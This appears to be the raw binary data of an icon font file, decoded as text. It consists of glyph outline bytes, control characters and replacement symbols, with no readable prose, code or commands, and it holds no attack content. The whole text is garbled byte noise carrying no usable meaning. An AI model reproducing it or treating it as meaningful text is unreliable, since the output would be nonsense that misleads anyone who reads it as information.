B(.BB.(~00~K%�%%�`%�PP��  `  `  `/!!//!!/���!-159F9>54&#"#"&5463!2#!575#"&'1!5!5352654&#"3�B..B@&&�&&�`�00

@@�� ���0!//!!//!B(.BB.(b%�%%�`%b�00�5  `  `  `/!!//!!/	�@�@"&*#5!!#!7!'5!!3'353535'35`����`��� ������� ` @`������ ��@��������������  �  @  �@�@#!35!!!3!#3#353535'35�@�@��@�����@��``   `������ �� �����  �  @  `@�@-5!!!'!!32+"&5463";2654&+`���'Ҍ�F��@�%%�%%

�

�0���� �@��%%%% 



`@�@	!!'!";2654&+`������F�%%�%%�@����%%%%`@�@	
+05:!!'!!32+"&5463";2654&+!'!!'!!'!`������F��@�%%�%%

�

�`���*��L&&�@���� �@��%%%% 



�  @  @  `@�@	"'!!'!";2654&+!'!!'!!'!`������F�%%�%%�`���*��L&&�@����%%%%�  @  @  `��-15!!!'!!32+"&5463";2654&+!5`���'Ҍ�F��@�%%�%%

�

����p������@��%%%% 



@```��!5!!!";2654&+��� �ࠠ ���%%�%%�```�� ����%%%%@@� -#!#!!%!532+"&5463";2654&+�@`@�  ��  � �%%�%%

�

� �� �@����%%%% 



@@� !%5!";2654&+`�  ��`%%�%%� � � ��%%%%@ �3!!7!3!7!!3'5�`�`�``���@��  ���@@�@���`` � ��� �@@�@ �!!775!75#`� �``���@@�� ��``  �� �@@�R�)'Nf3"'4672?64'#.'.'92012#"&546581:12654&'041.'9'.35"&7635"&'1X���5�T
�
	�

�[�!//!!/%1
<IG"5;%' �''�T5��"	�[
	�
	�
`/!!//!E4="8� o(4Sb= -XS�(+C3"'46781:12654&'401.'.'9.35"&7635"&'1X���5�T/,	
<IG#6:%' �''��T5��"bQ	5/
5<"8� o)3Sb= -X�Tl@*7	"'463!#"2?64'1"&54632'2654&#"3���5�T%�
�
	�

�[�!//!!//!@�T5��% 
�[
	�
	��/!!//!!/ �Tl@	"'463!2654&#"3���5�T%�@�T5��%�`4�@%4AN9>3!'"'46;#"2?%#"2?64'1"&54632'2654&#"3�	��*5�T%( 
�
	�]0�
�
	�

�[�!//!!//! �T5�	�% 
�[
	� 
�[
	�
	��/!!//!!/ `.�@*"789%"'463!2654&#"3�%�0�@`��5�T%� %��T�0 �T5��%��Tl@&AN[h533##5#57932672?64'!"7'546;"/>54&#"971"&54632'2654&#"31"&54632  `` `(0gI1Pd5��T�%X X
��

�	
lgI8!//!!//!<TT<<TT `` `` �P1Ig0(d�5�%�XY�
�^	
�	
m
Ig�/!!//!!/ � T<<TT<<T�Tl@(5B533##5#55'463!"/>54.#"972654&#"32654&#"3  `` `@%��5L!8L+8pIggIIggI `` `` �@%�T5�L8+L8!��gIIggIIg�Tl@5BO\`932672?64'!"7'546;"/>54&#"971"&54632'2654&#"31"&54632'35�(0gI1Pd5��T�%X X
��

�	
lgI8!//!!//!<TT<<TT���P1Ig0(d�5�%�XY�
�^	
�	
m
Ig�/!!//!!/ � T<<TT<<T�  �Tl@)6:'463!"/>54.#"972654&#"31"&54632'35�@%��5L!8L+8pIggIIgg���@%�T5�L8+L8!��gIIggIIg�  �Tl@5BO\c932672?64'!"7'546;"/>54&#"971"&54632'2654&#"31"&54632/77�(0gI1Pd5��T�%X X
��

�	
lgI8!//!!//!<TT<<TTLK4d{�P1Ig0(d�5�%�XY�
�^	
�	
m
Ig�/!!//!!/ � T<<TT<<T8L4d|�Tl@)6='463!"/>54.#"972654&#"32654&#"3/77�@%��5L!8L+8pIggIIggIK4d{�@%�T5�L8+L8!��gIIggIIgXL4d|�Tl@&AN[h%'7'77'932672?64'!"7'546;"/>54&#"971"&54632'2654&#"31"&546320DDDDDDD�(0gI1Pd5��T�%X X
��

�	
lgI8!//!!//!<TT<<TT�DDDDDDD�P1Ig0(d�5�%�XY�
�^	
�	
m
Ig�/!!//!!/ � T<<TT<<T�Tl@(5B%'7'77'463!"/>54.#"972654&#"32654&#"30DDDDDDD�@%��5L!8L+8pIggIIggI�DDDDDDD@%�T5�L8+L8!��gIIggIIg����4	"'1&47621"'1&47'12764'1&"127'���&j%&&uB��
	

��5v!!!]!��///�/���&&%j&uB��	
		��5u!]!!!��.�///� �@C%1".54>32"'&4?62"'&4?'2?64'&"2?'S�l??l�SS�l??l�0�&j%&&�B�		
	��5�!!!]!�///�/� ?l�SS�l??l�SS�l?n�&&%j&�B�

		��5� ]!!!�/�///�	� �@	&1;DLa1###.'1>731#.'>731#>799.'3>71#3.'2>54.#"3 Cx..8� �8..xC �8..xC Cx..8� *3�3**3�3*��3**3��3**3pS�l??l�SS�l??l�S 4*3�J`��J�3*4� `J�3*44*3�J��h.wCCw.�.wCCw.Cw..wC Cw..wC��?l�SS�l??l�SS�l?�!�@	)3<FQ%#1%.'3&'>71#11311#>71'.'3>713.'17>71#.'1�D82�J��%+�?4c/7�?43�J�D9/7�?43�J�D9��.8�?42�J�D8!R�4/8�/u@K�02�IK�0/8R�443�JL�0/8��R�53�JL�0/8��R�5� �@Pz��%1>77'>77'>735#.'7'.'7'.'>32''#3771#"&''.546777#31''1!9.'7'.'7'.'35#>77'>77'>72>54.#"3

  

1�HH�1

  

1�HH�1-33-


  


 


  


-33-��S�l??l�SS�l??l�S�(

, ,

(-44-(

, ,

(-44-1HH1
$

' '

$

$

' '

$
1HH1�?l�SS�l??l�SS�l?� �@V��%#"&'9>77'>77'>735#.'7'.'7'.'1>321''#317797>54&'''3#77"671%.546777#3''2&'1 6�OO�6


  


6�OO�6


  


)).81



  



��(-81



  



�2992(

, ,

(2992(

, ,

(+4GN�6
$

' '

$
3}FN�6
$

' '

$
� �@'5J1#"&'>54&'1>32.5467!9.5462>54.#"3	18811�HH�118811�HH�1-33--33-��-33--33=S�l??l�SS�l??l�S�6�NN�6-44-6�NN�6-44-1HH11HH11HH11HH��?l�SS�l??l�SS�l?� �@"1>.#"13267.54>71.54679!>54&' 6�OO�6/!!/6�OO�6/!!/18817@@7��18817@@7�2992BKR++RKB2992BKR++RKB6�NN�63�PP�36�NN�63�PP�3� �@)6CP%1".54>32'2>54.#"32654&#"32654&#"3#2654&#"3S�l??l�SS�l??l�SL�d::d�LL�d::d�L`� ?l�SS�l??l�SS�l? :d�LL�d::d�LL�d:��� �@!.;%1".54>322654&#"32654&#"3#2654&#"3S�l??l�SS�l??l�S`� ?l�SS�l??l�SS�l?�� �@.CXer#"&5467.5463211".54>32'2>54.#"352>54.#"352654&#"352654&#"3@/!!//!!/0S�l??l�SS�l??l�SL�d::d�LL�d::d�L+L8!!8L++L8!!8L+�!!//!!!!//!!�p?l�SS�l??l�SS�l? :d�LL�d::d�LL�d:�!8L++L8!!8L++L8!`�� �@.CP]#"&5467.5463211".54>32'2>54.#"352654&#"352654&#"3@/!!//!!/0S�l??l�SS�l??l�S+L8!!8L++L8!!8L+�!!//!!!!//!!�p?l�SS�l??l�SS�l?�!8L++L8!!8L++L8!`�� �@&/4:@EMbh.'77'>7'73#"&/%'?''57%>.'7!7''>322>54.#"3#'7r(O�#z1S1qjygH�K"55#3K)p{#�M{iq1S0��*^�'CkkC'�^�\\..FS�l??l�SS�l??l�Sf)z)f�0�R*c7N")?\zV3��KN��O�/O7c*.4Vz\?)~^l=.U�0ff0&U.=JJ�?l�SS�l??l�SS�l?�S��S� �@&/D.'77'>7'73#"&/%'?''572>54.#"3r(O�#z1S1qjygH�K"55#3K)p{#�M{iq1S0�S�l??l�SS�l??l�S�0�R*c7N")?\zV3��KN��O�/O7c*.4Vz\?)~�?l�SS�l??l�SS�l?@���*18IMQ3#5463!2#3#!"&=%#5.546753'>54&'#"3!2654&#!3#%3#`��
 
��
��
� 6JJ6 6JJ6)77) )77)��%& %&���``�``  `

`��`

`��Q88Q��Q88Q?**??**?�%� %%�%����@���+29=A3!5.54675!"3#!#!5>54&'5!2#3%>54&'#%35!35@&�6JJ6��%���%��6JJ6�&���@)77) )77)`��`� `%�Q88Q�%`��`%�Q88Q�%`��!?**??**?�����`���+:BJ_##5##5##5##5#53533533533533533##1"&'>32%.1067!510%032>10.#"1�        @@         @@ pKx..xKKx..x��><<> ><<>�@1i�rr�i21i�rr�i2�@@@@@@@@ @@@@@@@@@@ @�% %%��%T+QQ+��+QQ+|KZKKZKKZKKZK`���+:AH##5##5##5##5#53533533533533533##32671.#".1067>10&'�        @@         @@ ��/xIIx//xIIx/ SMMS SMMS�@@@@@@@@ @@@@@@@@@@ @f!!l!!��5nn5��5nn5`���+@U#5##5##5##5##33533533533533535#5#'1210#".10>"1032>10.#�        @@         @@ pr�i21i�rr�i21i�rf�a//`�ff�a//`�f�@@@@@@@@ @@@@@@@@@@ @�KZKKZKKZKKZK ANAANAANAANA`���+@##5##5##5##5#53533533533533533##"1032>10.#�        @@         @@ pr�i21i�rr�i21i�r�@@@@@@@@ @@@@@@@@@@ @@KZKKZKKZKKZK� �@';J[i�%1.5467.'13:77>71.'1.'1>7111>54&'9>7.'>54&'1.54>32#".'.'(=5 N.EVe6
B_wB 3[&-#.6(AXm<
0T")e86_'#/07�+4^PA4s>(.ZEy/:m1��?l�SS�l??l�SI�hGA(R�6,L/N:#>jM,* C}72�I&�7^E)'K" O/$0	.#6zC2�K&| 7I,(0yC�6-	'B#�P S�l??l�SS�l?1UvD� �@/>P`q.5467#*932631.5467.'#*#91>54&'17.'>54&'1.546797>54&'9�*%I�;DVd7
Gh�I=5 N.J]l;oP�3F�9!CycHBu/"T0
�&X16.(/0"?q,(3�Cz2)#.L7 DuV17R�6,L1R; �E7)!B#(-Mh>3)/O "K'(�/&5I�2?�OBKS,(0(>�Nn�C"'2E^k%14&>7.'79>7>79%'7>/&'&"6764/7''>"/&47>9%"32654&#|1G%62F#4\4$3$�4$3$�b�	<?a<���-
NT
!�c(-
G<TT<;UU;�G15&F20"�$4$3�$4$3���=@6=����
-
�!T��
.(
�T<;UU;<Tn�C'59DS%.'1#"&#&45463:3&45463:1'232654&51%%'>'"/&47>yH3U;H3T<G1A/�2F.B���IS8T
!��k�
(-

J�2H;U2I<T!1G/A�F2B.���I�b!T��l�{.(
K� �@Fe"32>54.#".54>32#"&'.#"3267>32#11.#"#"&546323267S�l??l�SS�l??l�SL�d::d�L3`RC8/1+L8!!8L+:78CR`3p?##G
.IggI$H##?@?l�SS�l??l�SS�l?�:d�LL�d:1E)!8L++L8!
)E1p)M# 
gIIg	
!#M� �@'b&.'.#"#"&546323267>7'&'.#"32>7.'.#"#".54>323267>71x?##G
.IggI$H##?GWa5S�l??l�S7eYI87:+L8!!8L+1/8_#M(/X( 
gIIg	
!
)C0?l�SS�l?4H,
!8L++L8!�``%,3%5"&51.1!09#3!5;265!+0%>1Oq*2	�3*pP��� ^B B^�� ]$�$��pP^cMLc_Pp�  `�B^^B6IJ��JH6�`` '%#!5#52651>1!013.1!30� �Pp*2	�`3*qO�$�]$�  �pP^cMLc_Pp��JI66HJ�``%,3<%5"&51.1!09#3!5;265!+0%>1#5#52653Oq*2	�3*pP��� ^B B^�� ]$�$�� @( ��pP^cMLc_Pp�  `�B^^B6IJ��JH6��� %�`` '0%#!5#52651>1!013.1!30#5#52653� �Pp*2	�`3*qO�$�]$� @( �  �pP^cMLc_Pp��JI66HJ�� %� ``(/6:>%3!53535"&51.1!01#3;265!+0%>135!5�`� `�Oq*2	�3*pP���^B B^�� ]$�$�d�����`�pP^cMLc_Pp�@�B^^B6IJ��JH6��@@`@@� ``$+%5#52651>1!013##!5.1!30��Pp*2	�`3*qO�`�@$�]$�`�pP^cMLc_Pp�`����JI66HJ ���-B#>327!#>7'!#".546712>54.#"3`�(( ,��`,L4�4&AW22WA&�+L8!!8L++L8!!8L+��2�$�����?���`�L*2WA&&AW2*L��!8L++L8!!8L++L8! ���-#>323.'+>72>54.#"3`�(( �(-�(-p2WA&&AW22WA&&AW2��4�`x!�`x!�@&AW22WA&&AW22WA& ���-BL#>327!#>7'!#".546712>54.#"357'373`�(( ,��`,L4�4&AW22WA&�+L8!!8L++L8!!8L+YPp  pP ��2�$�����?���`�L*2WA&&AW2*L��!8L++L8!!8L++L8!�BoQ``Qo ���-7#>323.'+>72>54.#"357'373`�(( �(-�(-p2WA&&AW22WA&&AW2YPp  pP ��4�`x!�`x!�@&AW22WA&&AW22WA&�BoQ``Qo`�`ETcr�!#"&=#"&=#5354632154632!54632>323##"&'#"&=7"326=4&#!"326=4&#%"32654&#!"32654&#�`@@�@@p	
	
��	
	
@	
	
�	
	
�p0 0pp0 0p`	�		�		�		�	@	�
	
	�
	
`�`E!#"&=#"&=#5354632154632!54632>323##"&'#"&=�`@@�@@�p0 0pp0 0p*@����
#'/3:>EIMQV\`dkovz~����������������35#35#535#5#35+1735+135735+13735#53535#35#355#5#535'35735.'#35'35.'35#35353#3.'.'3535#>7#'35#>715735#>71##>'35#735#.51##35##"&=46715.'151>3211"326=4&#1�    *   9 @	  @   @ `        @")    ` Z   @ `   3�    	"@     \ 	�  @  `�  �nMMn"8J**J8"�	
	
  W  
@   �  
b  	 @  � 4� ` �  R	
 �  @  �    `    @   (
   � @	  @ `  	  "*      @cY����Yc BtW33WtB ��	�		�	)@����
#'/3:>EIMQV\`dkovz~����������������35#35#535#5#35+1735+135735+13735#53535#35#355#5#535'35735.'#35'35.'35#35353#3.'.'3535#>71#'35#>715735#>71##>'35#735#.51##35##"&=46715.'151>3211�    *   9 @	  @   @ `        @")    ` Z   @ `   3�    	"@     \ 	�  @  `�  �nMMn"8J**J8"  W  
@   �  
b  	 @  � 4� ` �  R	
 �  @  �    `    @   (
   � @	  @ `  	  "*      @cY����Yc BtW33WtB ��`	&/9CMW`lx����1'.''.'75.'1211&"#2372637*5162?1>??>71'.'1895"&#897"#979>717'1"45#!##3!3''9>3235!'#!#1#"&'972654&#"3�	

	[	 	[	


	�!&D�D�D����`@@`$�``��� @+,@p<TT<<TT<5!	&$%" !      ! "$%&	!�
 

� ��>��`>"%%���f� g!"���` 1>1"45#!##3!3''9>3235!'#!#1#"&'972654&#"3eD�D����`@@`$�``��� @+,@p<TT<<TT<~ ��>��`>"%%���f� g!"��`A =LYf!>/.+";267!+"&57.?>;2130&'"+*'4&#"3265#4632#"&5�	#8H((H8#	]9!9]�}`
	*H2)@T.!.T@)2G*l` 
�&%%&`

�0"'F44F'"0 +54,��

�
.BR.!/Q=##=Q/!.RB.	7jj7&&&&



�`A 0=.?>;2!;267!+"&?;2679%4&#"3265�)@T.!.T@)�qHHq�4,

`
 
&%%&�0!/Q=##=Q/!0 9GG9��

�
%%%%� �@-E`x��&'.5467>17167>7>#.7.&47"672632'11&7.'.'61&'.'.>7>76#"&'.314.#"32>5�
-"K(&"
#	: :" .>*[bf42\QC$QX_28mf_)��
	1-ULB/X*IZi:/7dVE%CDZk;8?l�SS�l??l�SS�l?�/`\X(&
&S,=p.$	)SSP''D*\`c2q':/A(8
,	/")U+0 �L)	/=K,;cP9=Qc9,4W?#	\S�l??l�SS�l??l�S� �@2Jbx�.67>54&'.1'.&67"63>32'1.'"32>7>1>7.'&#1'>7.74'1>7.47671�+gq{?7g`V%,fnv<

?s`J"Q-Ocs>$N*>r`K��@xgR*X/IU_2(�1[)#107h	0$":"?�)>'+U)(8#,
9#5 
%J$%B\7��"8?lU=$A[6�
8RkA0Q?.
&
�+-eim55�M4`+
7olh/D'+Y[\,���`�2Wj����>7.54632117'7'#".5467''7762#"&'"'&4?.546329>54&#"5#53#32654&+>7326=#";54&#".2>54.#"352>54.#"32654&#"3�%Z3B..B3Z%'D(-4:d�LL�d:4-(D'cd
#$
%/!!/% ` �O		O%<O-
	-O<%O		O%<O-
	-O<%�Fz[55[zFFz[55[zF8cJ++Jc88cJ++Jc8				_".
-.BB.-
."(D'1�HL�d::d�LH�1'D(�dc
$#
G,!//!,>  �@
	-O<%O		O%<O-		-O<%O		O%<O��5[zFFz[55[zFFz[5@+Jc88cJ++Jc88cJ+				���`�$Vi���762#"&'"'&4?.5463297#".5467''7>71.546327'7''>54&#"5#53#154632>7#"&546;.'1#"&=32#2>54.#"32654&#"3cd
#$
�-4:d�LL�d:4-(D'%Z3B..B3Z%'D(�%/!!/% ` �%<O-	
-O<%O		O%<O-	
-O<%O		�8cJ++Jc88cJ++Jc8				{dc
$#
�1�HL�d::d�LH�1'D(".
-.BB.-
."(D'y,!//!,>  �@-O<%O		O%<O-		-O<%O		O%<O-	
�+Jc88cJ++Jc88cJ+				� ``AVc54632#"&=.54671%7'7'#".54>75#53#2>54.#"32654&#"3�	
	
	'D(-4:d�LL�d:7_�I ` Cw/�Fz[55[zFFz[55[zF				��
	�3
	3�(D'1�HL�d::d�LJ�c=@  @3+��5[zFFz[55[zFFz[5@				� ``BO54632#"&=.54671%.'1535#332>54&'77'2654&#"3�	
	
	/wC ` I�_7:d�LL�d:4-(D'�				��
	�3
	3�+3@  @=c�JL�d::d�LH�1'D(��				��
#.?2654&#"31+"&=46;>74&#'*#0*1013267'p�
�

��

	��--�2<2�� �
 
�
	
���Z
Z�x ���&+"&=46;?6&/&2654&#"3��
�

��X/	

0��$�y
 q-`
	
`����`�-8NYk32+"&/7;0410*1#'7'''&6?6'4"#"7+"&=46;>74&#'*#0*1013267'HX�

�
BL�2<2VX!g	

--
�

��

	��--�	2<2�����
 
�#� �$�$,D$�
	
hZ
Z�8
 
�
	
���Z
Z�m �����_�.9+"&=46;?6&/&'7;26=4&+''&6?6t�
�

��X,	

-r-X7XA
�

�X7�,	

-X*�s
 
w-Y
	
Y�Z-n��
 
�p(Y
	
Z,���@�%.%3'''33'54.#"77754632�=d<no`?}^<=^}>`A!8L++L8!�`p��p`�gIIg[��TST@����@RP+L8!!8L+P��``````@0IggI0���@�#54.#"#7''33/3�!8L++L8!d>ss>�\`�~>&?_\=>�0+L8!!8L+0 ��VV��O` ��#1��`O#���=@M32>54.#"15->32#".546732654&'
2654&#"3�c}:d�LL�d::d�L9��@ 9Fz[55[zFFz[5kU%/!!/%P�����eG-4''44'����z)))"6
6����P



���)63->32#".546732654&'52654&#"3� ��@@(L�d::d�LL�d:jV/!!/���������'44''4)CXg�



�a.@$0<I%9#"&54675#53#%'7'77'7'77'7'772654&#"3?$/!!/%� �i	��8998988�8998988�8998988I�,!//!,ki� ��v898998989899898989989���a.@".:%535#3532654&'%'7'77'7'77'7'77?��i� %/!!/$��8998988�8998988�8998988�v �i�k,!//!,898998989899898989989��@�$0Kn���%9#"&54675#53#%'7'77'7'77546;232#!"&=46;'#"#"3!2654&+4&+4&+"932#!"&546;3!2659'2654&#"32654&#"3�%/!!/%� �j
�9889988�9889988��& %@

��

@  & %%�%% & 8( (8@ 

� 

 & &�				��,!//!,Ki� ��V899889988998899_ &% 
 

 
 %%�`&%�&%(88(`
�`

�
%%@				�@��@�=Vbn{�546;232#!"&=46;32#!"&546;813!26=89535#3532654&'9%7'7''7'7''2654&#"32654&#"3�& %@

��

@  %%� %% % &@��j� %/!!/%�988998899889988)�				  &% 
 

 
 &�`%&�% &% ��V �i�K,!//!,899889988998899���				�� �"7DQ9.54>32'7#"&'12>54.#"351"&54632'2654&#"3@,4-Ni<<iN-4,�� ��"R,,R"�5]F((F]55]F((F]5PppPPppPB^^BB^^B�(o@<iN--Ni<@o(�7�������c(F]55]F((F]55]F(@pPPppPPp ^BB^^BB^�� � -:7#"&'11".54>32'2654&#"352654&#"3@��(b66b(�<iN--Ni<<iN--Ni<PppPPppPB^^BB^^B��`���"" -Ni<<iN--Ni<<iN-`pPPppPPp ^BB^^BB^�� �"7A9.54>32'7#"&'12>54.#"357'373@,4-Ni<<iN-4,�� ��"R,,R"�5]F((F]55]F((F]5p0`p00p`0�(o@<iN--Ni<@o(�7�������c(F]55]F((F]55]F(�J�@��@��� � *7#"&'12>54.#"357'373@��(b66b(�<iN--Ni<<iN--Ni<p0`p00p`0��`���"" -Ni<<iN--Ni<<iN-�J�@��@����B� *4IVc'.54>32'810"9'9.'77972>54.#"351"&54632'2654&#"3�7|�0:-Ni<;iO-:1�|8�!!=mS%n�=!n%Rl�5]F((F]55]F((F]5PppPOqqOB^^BB^^B@��|7j(tD<iN--Ni<Dt(��7|o��%S+��S%
(F]55]F((F]55]F(@pPPppPPp ^BB^^BB^���B�'4A'17'>791".54>32'2654&#"352654&#"3�7|&\3΀|8�2\&�<iN--Ni<;iO--Oi;OqqOPppPB^^BB^^B ��|7K"A��7|O"!-Ni<<iN--Ni<<iN-`pPPppPPp ^BB^^BB^���B� *4IS'.54>32'810"9'9.'77972>54.#"357'373�7|�0:-Ni<;iO-:1�|8�!!=mS%n�=!n%Rl�5]F((F]55]F((F]5p0`p00p`0@��|7j(tD<iN--Ni<Dt(��7|o��%S+��S%
(F]55]F((F]55]F(�J�@��@����B�'1'17'>792>54.#"357'373�7|&\3΀|8�2\&�;iO--Oi;<iN--Ni<p0`p00p`0 ��|7K"A��7|O"!-Ni<<iN--Ni<<iN-�J�@��@����^�*?LY926323#".54677>772>54.#"351"&54632'2654&#"3���!;��*0-Oh<<iN-0*��; ��5]F((F]55]F((F]5PppPOqqOB^^BB^^B-s��p��(l=<iN--Ni<=l'z��l����(E]65]E))E]56]E(@pPOqqOPp ]CB^^BC]���^�%2?.'1791".54>32'2654&#"352654&#"3"���$Z2����3Y$�<iN--Ni<<hO--Oh<OqqOPppPB^^BB^^BLTH�� (NZH��( ��-Ni<;iN..Ni;<iN-`pPOqqOPp ]CB^^BC]���^�*@J926323#".54677>772>54.#"3157'373���!;��*0-Oh<<iN-0*��; ��5]F((F]55]F((F]5p0`p00p`0-s��p��(l=<iN--Ni<=l'z��l����(E]65]E))E]56]E(�I�@��@����^�&0.'1792>54.#"3157'373"���$Z2����3Y$�<hO--Oh<<iN--Ni<p0`p00p`0LTH�� (NZH��( ��-Ni<;iN..Ni;<iN-�I�@��@�` <T_c1233267>7>7#"&'.'.'"&#&!4&+"4&5461546;2#!"&=33!26=!35�
"
-2	$	]gc^B B^��qO Oq&��% 
 
�� �	.K,I@B^^B"��J6`H PppP�`%%@@

@   ` 3>B!4&+"33267>7>7#"&'"&'.'1!#!"&=35i�qO Oq%O!-2%S(?��&��%@��T93@PppP	'/�@%%@   ����!6CGKO9.#"326732654&'%5!#5#"%!#"&5467>3312#"&546357%'%%fBPp��` BfY��^BB^I7���


- �DD��DD�%%=PpP
	8`@@P=m&: B^^B:X@@



`��!llll���� -159>;35!#"&'#"&546321"32654&#357%'fB `@��pPBf%%'



  �DD��DD�=P@@`8	
PpP=%%



`��!llll	` �@8Lck�����?.54>32"67>7>7&'.041>7>7269716322>7.'>7>.'0"17>#1023:1#96'>7.77>7.72799&'.#"#36.67>54&'.9>27.'.5�!?l�SS�l?-(
	,]bf50`_^-
�/_02Q*X/$a9�.C%O2/Z+���
"&(K"-
#. ": :	>CQ\24fb[*)_fm82_XQ$�O+Y[[.T�G%PRU,+XVU*�/m<S�l??l�SF~3
*
" 
(0)j@=`"[D',@l*��.p=,S&
&(X\`/$2c`\*D''PSS)	q(A/:'8 0+U)"/	,
�^/$$$`?�@ 4Og��%>74'9'>7.'9'.74>79%.67>54&'.1'.&67"63>32'1%>7.47671>7>>7>7&'.85>27.'.5{"6-Q"<�F"#8*X/8>
�!-07/a24+gq{?7g`V%,fnv<

?s`J��	0$":"?�
0ehi40^YU(	,]bf50`_^-_+Y[[.T�G%PRU,+XVU*�$T/8"&$T1&CK-bfh45�M,S&�)>'+U)(8#,
9#5 
%J$%B\7�7olh/D'+Y[\,��" 
*
" 
)'/$$$  @:P0'.35.'.'2&#&15065&1506561&410'32613>>10&'.1QC
*'>V]CIWWI))F[[E.4�� !}R<dH((Hd<<dH(�
	
�	��



����o	$�
  @ 7H617#0'.'.'5&150653>>10&'.19.'.'5`IW[E()IW]C')�� !}R<dH((Hd<<dH(�'*))��
	��
	
��o	$�
�
	


��@�@Fb�%#5'7#537#537'7'#5'.54>32#"&'5732>54.#"#7<54632#*#73>54&#".54>32#"&'732654&#"   )+Kk Kk�` � '7`�II�`77`�I5b)'a5BuW22WuBBuW2!$�8((88(	"%% \#=R..R=##=R.!=1PppPPp
� gG)+   � `�gGY)b5I�`77`�II�`7"!2WuBBuW22WuB5a(�(88((8 %%"
t=".R=##=R..R=#pPPppP2�@�@Flw%#5'7#537#537'7'#5'.54>32#"&'5732>54.#"#732654&#"17'7<54632#*#'7>54&#"7   )+Kk Kk�` � '7`�II�`77`�I5b)H=!.R=##=R..R=#G$�11PppPPp
138((88(5"%%`� gG)+   � `�gGY)b5I�`77`�II�`7"H#=R..R=##=R."=GK1pPPppP21(88((825%%"�`` )>KXe%1".54>32'2>54.#"351".54>32'2654&#"351"&54632'2654&#"3I�`77`�II�`77`�IBuW22WuBBuW22WuB.R=##=R..R=##=R.PppPPppP(88((88(%%%%`7`�II�`77`�II�`7 2WuBBuW22WuBBuW2`#=R..R=##=R..R=# pPPppPPp`8((88((8 %%%%�`` )6CP%1".54>32'2>54.#"351"&54632'2654&#"352654&#"3I�`77`�II�`77`�I.R=##=R..R=##=R.PppPPppP(88((88(%%%%`7`�II�`77`�II�`7�#=R..R=##=R..R=# pPPppPPp`8((88((8 %%%%��`�(773!267!%!#!"&5!3	7#5%1>101!067130&546101�
2�2
��;@K5�`5K@ @���Hx  ��U7�W/�$$ 5KK5�@ �� �@x8�llT�Ni]SMMzGZ��`�!#!"&5!3!1!0&54610 @K5�`5K@ @���H   xH5KK5�@ x�Tll�8x`_�@!$'5Dj%3265!#!>7.'1362!+977#5%1>101!067130&546101>7>>7>7&'.85>27.'.5�5K�� ��
	��
2}:����Hx  ��U7�W/�
0ehi40^YU(	,]bf50`_^-_+Y[[.T�G%PRU,+XVU*�K5� &$� �� �@x8�llT�Ni]SMMzGZ�Z" 
*
" 
)'/$$$`?�@'Mb%3265!#!>297!1!0&54610>7>>7>7&'.85>27.'.5�5K�� ��
,[\^/$G"����H   xH�
0ehi40^YU(	,]bf50`_^-_+Y[[.T�G%PRU,+XVU*�K5� &� x�Tll�8x�" 
*
" 
)'/$$$�@@  $3A]y37#130654&'#73>54&#"37#130654&'#73>54&#"1#0&546154&546320!1#0&546154&546320�>@$3Z3$[D''��>@$3Z3$[D''�@�@@ 0000 @�@�@@ 0000 @@`cCUllUCc�())(`@`cCUllUCc�())(��a��a`@0<$55$<0@`a��a`@0<$55$<0@`�@@ #1?53130654&''.54632#53130654&''.54632#��� @�@ �0000����� @�@ �0000�@@ c?a��a?c�!2552!`@@ c?a��a?c�!2552!@ ?CQ^kx�%9.5467.'#130671#0&546154&546320>32#"&'137#'3>54&#"2654&#"352654&#"32654&#"332654&#"3�
[$3Z
�@@ 0000 %/IggI#=x>@D''�<TT<<TT<				 				@				�4&B&9cCUl�a`@0<$55$<0@C7gIIg�@ ())(�T<<TT<<T�				@								@ )6CP]%1#0&546713953'.54632#1"&546322654&#"32654&#"332654&#"3��@ �/;("���0000�IggIIggI				 				@				Q	�a?ca:0R�@@`!2552!��gIIggIIg				@								� �@;?]z14132653#".505#53!#"&=35#330"32>5#535#;26?62;26=4&#!"1%2+"&/&"+"&=463!^BB^`(F]55]F(@� qOPp@�@#=R.EE.R=#   � ^B 
9*8 B^gI��Ig�<TK5 8L9 5KT<@ //B^^B ��5]F((F]5]]``PppP    .R=##=R.` ��B^RR^BIggI�T<5KQ##QK5<T� �@"@]z35#34132>5##"&50553;26?62;26=4&#!"1%2+"&/&"+"&=463!2+2&'&"63#"&=463!@�@(F]55]F(`^BB^` �^B 
9*8 B^gI��Ig�<TK5 8L9 5KT<@.B8( 9"n"9 (8B.@ ``]]5]F((F]5 ��B^^B//���PB^RR^BIggI�T<5KQ##QK5<T A/(8Q11Q8(/A��`3|���''"#*1"3!26506.#"#"&#"''#"4&'.+"&'.5:32677'>74277'461>77'>77'>703267>7#!"&'3267>;.5463:3:3;2+%243267>7>300101#"&'.1'>3�00(8K5`&7!HH$1��.21�	

J-,P$	
��%�":.4G��$&		#� 4��	1&%0


 H('>+8(5K&ZlZ??
^'
! l

		&
�

��`Gdw�1''1'"#*#1;2>13.'#"&'.'1'*1"1!2674&'.+"&'.=3!26506'#0#!>3232632#"&'0&'1�!  	�/a�		$P,F\  �(87�#	o;#`&�n($D"��y
$HH!7
	 H(;N/31..-2
	"T#B0
21O8(	
�#&??
8)	���`K����''"#*1";35335335335335335326506.#"#"&#"''#"4&'.+"&'.5:32677'>74277'461>77'>77'>703267>7#!"&'3267>;.5463:3:3;2+%243267>7>300101#"&'.1'>31�00(8K5@ @ @ @ @ @  &7!HH$1��.21�	

J-,P$	
��%�":.4G��$&		#� 4��	1&%0


 H('>8(5K            &ZlZ??
F'
! l

		&
�

���`Gd��1''1'"#*#1;2>13.'#"&'.'1'*1"1!2674&'.+"&'.=;35335335335335335326506'#0#!>3232632#"&'0&'1�!  	�/a�		$P,F\  �(87�#	o;#@ @ @ @ @ @  &�n($D"��y
$HH!7
	 H(;N/31..-2
	"T#B0
21O8(	
�#            &??
8)	`��`A�����''"#*1";#"&5#3!5#5326506.#"#"&#"''#"4&'.+"&'.532677'>74277'461>77'>77'>703267>79#!"&'3267>;.546;:3;2+%243267>7>300101#"&'.1'>39!!�00(8K5@�
 %��&7!HH$1��.21�

J-,P$	
��%�":.4G��$&		#� 4��	1&%0


 H('>�`��8(5K@
% @&ZlZ??
F'
! l

		&
�

��@`��` $i��#"&5#3!5#5326506'#0#!;3!!1''1'"+;2>13.'#"&'.'1'*1"1!2674&'.+"&'.=%>3232632#"&'0&'9@�
 &���&�n($D"��;#@ `��b!   �/a�		$P,F\  �(87�#	

$HH!7
	 H(;N@
& @&#@o31..-2
	"T#B0
21O8(	
v??
8)	`���!C3!2654&'14654&#".#"1%#!"&54671<54>32>329�*9K5 5K8)T<4[8Pp}*6^B��B^6*#=R.7^/Hg�
F-5KK5-E

